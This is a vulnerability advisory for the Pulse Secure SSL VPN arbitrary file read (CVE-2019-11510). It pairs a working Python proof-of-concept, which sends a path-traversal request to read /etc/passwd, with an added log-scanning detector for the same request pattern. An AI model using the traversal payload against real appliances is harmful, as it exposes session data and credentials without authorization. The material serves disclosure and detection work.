(CVE-2019-11510) Pulse Secure SSL VPN Arbitrary File Read

1. Vulnerability overview

Pulse Secure Pulse Connect Secure (also known as PCS, formerly Juniper Junos Pulse) is an SSL VPN solution from the US company Pulse Secure. CVE-2019-11510 stems from a newly introduced feature for reaching other ports through the browser that lacks proper security restrictions. Any attacker can exploit it without authentication to read sensitive system files and obtain sessions, plaintext passwords and other sensitive data, gain unauthorized access to and control of the VPN, and from there threaten services on the corporate intranet.

2. Affected versions

Pulse Secure PCS 9.0RX

Pulse Secure PCS 8.3RX

Pulse Secure PCS 8.2RX

Pulse Secure PCS 8.1R15.1

3. Reproduction

PoC script:


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import sys
import traceback
import warnings
from urllib.parse import urlparse

import requests

# Silence the InsecureRequestWarning that verify=False would otherwise emit on every request
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")


def CVE_2019_11510(base_url):
    try:
        # Traversal path sent verbatim, and the marker expected in /etc/passwd on a vulnerable host
        payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
        # requests does not collapse the ".." segments, so the path reaches the server as-is
        # (the equivalent curl invocation needs --path-as-is for the same reason)
        r = requests.get(base_url + payloads, verify=False, timeout=10)
        r.close()
        if keywords in r.text:
            print("[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
                base_url + payloads, r.text))
        else:
            print("[x] Not Found Vuln!")
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except Exception:
        traceback.print_exc()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print('[+] Tip: python3 {} <url>'.format(sys.argv[0]))
        sys.exit(0)
    parsed = urlparse(sys.argv[1])
    # Only scheme and host are kept; any path in the supplied URL is discarded
    CVE_2019_11510(parsed.scheme + "://" + parsed.hostname)
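The other side of the same request: a defender-side check that finds this traversal pattern in HTTP access logs. This is an added example, not part of the original page or of any Pulse Secure tooling. It assumes combined-log-format lines (as produced by a reverse proxy or HTTP inspection sensor in front of the appliance); the sample lines, the `scan_log` and `resolve_traversal` helpers and the `Finding` record are all constructed here for illustration. It also handles the URL-encoded variant of the `..` segments, which the page's own PoC does not send.

```python
import re
from dataclasses import dataclass
from posixpath import normpath
from urllib.parse import unquote

# The published CVE-2019-11510 request shape: enter the html5acc/guacamole handler via
# /dana-na/../dana/, then walk back out with repeated "../" segments. The query string
# must start with the guacamole path again. Both halves are checked on the DECODED but
# UN-NORMALISED request path: once a proxy collapses the "..", the indicator is gone.
TRAVERSAL_RE = re.compile(r"/dana-na/\.\./dana/html5acc/guacamole/(?:\.\./)+", re.IGNORECASE)
GUAC_QUERY_RE = re.compile(r"\?/dana/html5acc/guacamole/", re.IGNORECASE)

# Combined log format: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (RFC 5737 documentation addresses, made-up timestamps):
# line 1: the PoC request, answered with 200 -> file was served
# line 2: ordinary login page request, benign
# line 3: same traversal with percent-encoded "..", answered with 403 -> blocked attempt
SAMPLE_LOG = """\
203.0.113.5 - - [26/Aug/2019:10:14:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1843 "-" "curl/7.64.0"
198.51.100.7 - - [26/Aug/2019:10:14:09 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Aug/2019:10:15:31 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 403 162 "-" "python-requests/2.22.0"
"""


@dataclass
class Finding:
    client: str
    time: str
    raw_path: str
    resolved_path: str   # file the traversal resolves to after collapsing ".."
    status: int
    severity: str        # "confirmed" when the server answered 200, else "attempted"


def resolve_traversal(raw_path: str) -> str:
    """Decode percent-encoding and collapse '..' to show which file the request targets."""
    path_only = raw_path.split("?", 1)[0]
    # normpath on an absolute path drops any ".." that would climb above "/"
    return normpath("/" + unquote(path_only).lstrip("/"))


def scan_log(lines):
    """Return one Finding per log line that matches the CVE-2019-11510 request shape."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        decoded = unquote(raw)          # catches %2e%2e as well as literal ".."
        if not (TRAVERSAL_RE.search(decoded) and GUAC_QUERY_RE.search(decoded)):
            continue
        status = int(m.group("status"))
        findings.append(Finding(
            client=m.group("client"),
            time=m.group("time"),
            raw_path=raw,
            resolved_path=resolve_traversal(raw),
            status=status,
            severity="confirmed" if status == 200 else "attempted",
        ))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] {f.client} at {f.time} read {f.resolved_path} (HTTP {f.status})")
```

A 200 on the resolved path is the strongest signal: the appliance actually returned the file, and anything it held (session records, credentials) should be treated as exposed, which in practice means rotating them rather than only patching. Run the check against raw request lines; a WAF or proxy that normalises paths before logging will silently remove the `..` segments that make up the indicator.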